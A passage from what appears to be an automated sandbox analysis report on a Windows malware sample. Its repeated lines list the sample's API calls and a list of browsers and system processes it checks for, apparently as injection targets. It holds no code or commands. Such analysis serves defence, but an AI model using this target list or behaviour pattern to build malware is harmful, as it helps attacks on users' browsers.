reateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe5_2_028A67D0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe5_2_028A67D0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: GetCommandLineA,StrStrIA,memset,#680,LoadLibraryExA,GetProcAddress,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,strstr,strstr,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree, \iexplore.exe5_2_028A1660
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: memset,GetModuleFileNameA,InitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex5_2_028937E0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: memset,GetModuleFileNameA,InitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex5_2_028937E0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: memset,GetModuleFileNameA,InitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex5_2_028937E0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex6_2_02457300
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex6_2_02457300
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex6_2_02457300
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe6_2_024567D0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \iexplore.exe6_2_024567D0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \firefox.exe6_2_024567D0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \tbb-firefox.exe6_2_024567D0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe6_2_024567D0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe6_2_024567D0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: GetCommandLineA,StrStrIA,memset,#680,LoadLibraryExA,GetProcAddress,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,strstr,strstr,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree, \iexplore.exe6_2_02451660
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: memset,GetModuleFileNameA,InitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex6_2_024437E0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: memset,GetModuleFileNameA,InitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex6_2_024437E0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: memset,GetModuleFileNameA,InitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex6_2_024437E0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex8_2_012F7300
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex8_2_012F7300
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex8_2_012F7300
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe8_2_012F67D0
